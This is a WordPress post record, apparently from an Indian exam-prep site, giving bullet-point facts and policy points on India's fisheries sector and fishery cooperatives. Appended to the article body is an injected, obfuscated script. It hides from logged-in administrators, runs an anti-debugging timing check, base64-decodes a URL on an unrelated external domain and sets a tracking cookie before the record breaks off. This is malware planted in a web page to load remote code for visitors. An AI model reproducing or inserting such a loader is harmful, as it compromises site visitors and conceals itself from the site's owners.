{"id":471,"date":"2023-12-03T10:37:02","date_gmt":"2023-12-03T10:37:02","guid":{"rendered":"https:\/\/iasquest.com\/?p=471"},"modified":"2026-02-11T19:28:22","modified_gmt":"2026-02-11T19:28:22","slug":"fishery-cooperatives-a-blue-ocean-for-economic-development","status":"publish","type":"post","link":"https:\/\/kingmakersiasacademy.com\/current-affairs\/fishery-cooperatives-a-blue-ocean-for-economic-development\/","title":{"rendered":"FISHERY COOPERATIVES A BLUE OCEAN FOR ECONOMIC DEVELOPMENT"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\"><strong>Data<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Fisheries sector is a <strong>sunrise sector <\/strong>in India.\u00a0<\/li>\n\n\n\n<li>It has immense economic potential in India that has a coastline of over <strong>8,000 km, an exclusive economic zone of over 2 million square km, and with extensive freshwater bodies <\/strong>stretching the length and breadth of the nation. <\/li>\n\n\n\n<li>India is the <strong>3rd largest fish-producing country in the world<\/strong>.\u00a0<\/li>\n\n\n\n<li>Contributes <strong>7.93% of global fish production<\/strong>.\u00a0<\/li>\n\n\n\n<li>India is the <strong>second largest aquaculture fish-producing <\/strong>country in the world. <\/li>\n\n\n\n<li>It contributes to around <strong>one per cent of the national GDP<\/strong>.<\/li>\n\n\n\n<li>It provides <strong>livelihoods to more than 2.8 crore fishers and fish- farmers<\/strong>.<\/li>\n\n\n\n<li>The country has <strong>annual export earnings of over Rs 50,000 crore <\/strong>from the fisheries sector.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Fishery development &#8211; government of India\u2019s thrust<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>The <strong>Pradhan Mantri Matsya Sampada Yojana (PMMSY) <\/strong>was launched by the Ministry of Fisheries, Animal Husbandry and Dairying.<\/li>\n\n\n\n<li>A dedicated <strong>Rs 7,522 crore Fisheries &amp; Aquaculture Infrastructure Development Fund (FIDF) <\/strong>was created\u00a0<\/li>\n\n\n\n<li><strong>Blue Revolution <\/strong>&#8211; <strong>not only <\/strong>boosting the fish production but also infrastructure development in the fisheries sector.\u00a0<\/li>\n\n\n\n<li>The <strong>fishery cooperative movement <\/strong>in India &#8211; <strong>&#8216;Karla Machhimar Cooperative Society&#8217; <\/strong>in Maharashtra.<\/li>\n\n\n\n<li>The <strong>National Fisheries Development Board (NFDB) and FISHCOPFED <\/strong>have\u00a0been assigned to speed up the work.<\/li>\n\n\n\n<li><strong>Kausalyaganga at Bhubaneswar <\/strong>is a recognised fisheries hub in the country where FISHCOPFED has a training centre.<\/li>\n\n\n\n<li><strong>Matsyafed &#8211; Kerala<\/strong><\/li>\n\n\n\n<li><strong>Gujarat Fisheries Central Cooperative Association (GFCCA)<\/strong><\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Need for focus.<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Around <strong>4 million people are economically benefited <\/strong>through primary fishery cooperatives in India.<\/li>\n\n\n\n<li>The fishery cooperative sector can provide <strong>livelihood security, nutritional security, and social security to the vulnerable groups <\/strong>in our society.<\/li>\n\n\n\n<li>The fisheries cooperative sector represents <strong>weaker section people <\/strong>who are mostly <strong>living below the poverty line.<\/strong><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Way Forward<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>There is an urgent need for the <strong>adoption of digital technology <\/strong>by fishery cooperatives to provide their <strong>services at the doorstep <\/strong>and play a key role in providing <strong>nutritious food to the people<\/strong>.<\/li>\n\n\n\n<li>The fishery cooperatives should be <strong>supported with funds <\/strong>to develop <strong>infrastructures and a progressive supply and value chain for sustainability<\/strong>.<\/li>\n\n\n\n<li>The Government of India is committed to uplift the fishery cooperative sector through <strong>adequate policy and financial support<\/strong>.<\/li>\n\n\n\n<li>There is a need to <strong>insure over ten million fishermen <\/strong>under the <strong>Group Accident Insurance Scheme (GAIS) <\/strong>within the next 2 to 3 years.<\/li>\n\n\n\n<li>Fishery cooperative members should be provided with <strong>online awareness training about the PMMSY scheme <\/strong>and Cooperative Principles.\u00a0<\/li>\n\n\n\n<li>They shall be provided <strong>marketing support for a sustainable business plan <\/strong>to excel in domestic marketing.<\/li>\n\n\n\n<li><strong>Computerization of a primary fishery cooperative <\/strong>can accelerate the growth of the sector at the micro level.<\/li>\n<\/ul>\n<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1;
